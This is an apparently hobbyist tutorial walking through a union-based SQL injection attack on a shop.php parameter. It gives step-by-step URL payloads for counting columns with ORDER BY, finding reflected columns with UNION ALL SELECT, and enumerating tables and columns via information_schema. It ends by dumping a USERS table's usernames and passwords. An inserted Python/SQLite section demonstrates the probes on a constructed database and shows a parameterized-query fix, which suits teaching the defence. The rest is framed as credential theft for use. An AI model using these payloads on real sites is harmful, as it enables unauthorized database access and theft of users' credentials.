Steps to perform SQL Injection attack

Finding Exact Number Columns in Website

Once you know that the website is vulnerable to SQL injection, the next step is to find the exact number of columns in the website's database query. You can find it by running the query below:
www.example.com/shop.php?id=6 ORDER BY <NUM>--
Now say the website has 16 columns. You don't know this yet, but you can find it with a binary-search style approach. For example, run requests in the following sequence:
www.example.com/shop.php?id=6 ORDER BY 10--
Result: a page opens with data, i.e. no error page. Then increment by 10, i.e.
www.example.com/shop.php?id=6 ORDER BY 20--
and so on until you get the error message below:
Unknown column '<NUM>' in 'order clause'
or any other custom message. Once you get this error, it means you have exceeded the exact column count, so decrease the number one by one until the error disappears. The last successful page gives the exact column count. Say you get 16 columns; then the last successful request must be:
www.example.com/shop.php?id=6 ORDER BY 16--
These steps give the exact number of columns in the website's database query.

Finding Vulnerable Columns using UNION ALL clause

Once you know the exact number of columns in the database, you can get the list of all vulnerable columns by running the query below:
www.example.com/shop.php?id=6 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--
This returns a page on which some numbers are displayed. Those are the vulnerable columns. Now say 2, 4 and 8 are displayed on the page. This means column 2, column 4 and column 8 are the most vulnerable columns, which can be used to run your own SQL queries. If the above query shows the normal web page as it usually displays, the query has failed. Then we use the field exploitation technique of inserting '-' in the ID value, so the query becomes something like this:
www.example.com/shop.php?id=-6 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--
Wow, now you have some numbers scattered over the web page; those are the vulnerable columns on the website.
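As an added illustration that is not part of the original tutorial, the following Python script builds a small SQLite stand-in for a shop.php backend (a constructed 3-column products table instead of the tutorial's 16 columns) and shows why the ORDER BY probe errors past the column count and why the negative id leaves only the injected row to render, beside the parameterized handler that stops both. All table, column and function names are assumptions for the example.

```python
import sqlite3

# Constructed stand-in for the page's shop.php backend: one table with 3
# columns (the tutorial's site has 16; the mechanism is the same).
def build_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE products (id INTEGER, name TEXT, price INTEGER)")
    db.executemany("INSERT INTO products VALUES (?,?,?)",
                   [(6, "Widget", 10), (7, "Gadget", 25)])
    return db


def shop_vulnerable(db, id_param):
    # The defect the tutorial relies on: the id parameter is pasted into the
    # SQL text, so ORDER BY / UNION ALL fragments become part of the statement.
    sql = "SELECT id, name, price FROM products WHERE id=" + id_param
    return db.execute(sql).fetchall()


def shop_hardened(db, id_param):
    # The fix: validate the type, then bind the value. The driver passes it as
    # data, so nothing in it can change the statement's structure.
    id_value = int(id_param)  # rejects anything that is not a plain integer
    return db.execute("SELECT id, name, price FROM products WHERE id=?",
                      (id_value,)).fetchall()


def probe(fn, db, id_param):
    """Rows fn returns for id_param, or the name of the exception it raises."""
    try:
        return fn(db, id_param)
    except (sqlite3.Error, ValueError) as exc:
        return type(exc).__name__


if __name__ == "__main__":
    db = build_db()
    # ORDER BY probe: 3 is fine, 4 exceeds the column count and errors out.
    print(probe(shop_vulnerable, db, "6 ORDER BY 3--"))
    print(probe(shop_vulnerable, db, "6 ORDER BY 4--"))
    # With a real id the genuine row comes first and the page looks normal;
    # with an id that matches nothing, only the injected row is left to render.
    print(probe(shop_vulnerable, db, "6 UNION ALL SELECT 1,2,3--"))
    print(probe(shop_vulnerable, db, "-6 UNION ALL SELECT 1,2,3--"))
    # The hardened handler never lets the fragment reach the SQL parser.
    print(probe(shop_hardened, db, "-6 UNION ALL SELECT 1,2,3--"))
```

The same binding discipline applies to every later query on this page: a bound parameter cannot carry ORDER BY, UNION ALL or information_schema text into the statement, so the whole column-counting and extraction chain stops at step one.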

Test run to validate vulnerable columns

Now that we have the list of all vulnerable columns, the next step is validating that we are correct. The easiest way to validate is to execute the version() function in a vulnerable column. For example, say column 2 was vulnerable:
www.example.com/shop.php?id=-6 UNION ALL SELECT 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16--
Now, in place of 2, the web page displays the database version number. Check this for all vulnerable columns.

Use Information Schema to get Table Names

Now that we know the vulnerable columns of the database, the next step is extracting table names from the database. This relies on the information schema. Learn more about using the information schema to extract table names here:
http://dev.mysql.com/doc/refman/5.1/en/tables-table.html
Using the information schema we can execute queries as if we were administrators. So, to extract table names, we run the query below on column 2 (the vulnerable column).
www.example.com/shop.php?id=-6 UNION ALL SELECT 1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16 from information_schema.tables where table_schema = database()--
The above query gives you the complete list of tables present in the database. You know which table you need to search for usernames and passwords :D

Step 6: Use information schema to get Column names

Using the same concept as in step 5, we use the information schema to extract column names too. Learn more about using the information schema to extract column names:
http://dev.mysql.com/doc/refman/5.1/en/columns-table.html
Now, to extract column names from the database, the query below works like a bullseye:
www.example.com/shop.php?id=-6 UNION ALL SELECT 1,group_concat(column_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16 from information_schema.columns where table_schema = database()--
The above query extracts all column names.

Step 7: Use Information Schema concept to get column values of required table

Well, till now we have table names and column names. The only thing left is the data from the tables. Now say we have a table USERS with the columns USERNAME and PASSWORD. To extract data from the USERS table, the query below is sufficient:
www.example.com/shop.php?id=-6 UNION ALL SELECT 1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16 from USERS--
The above query displays usernames and passwords in the format username:password, since 0x3a is the hex value for ':'. That's it guys, now you have usernames, passwords and table names. What else do you need? That's all for today; we will continue to learn more about injection attacks in later tutorials. If you have any queries or doubts, feel free to ask.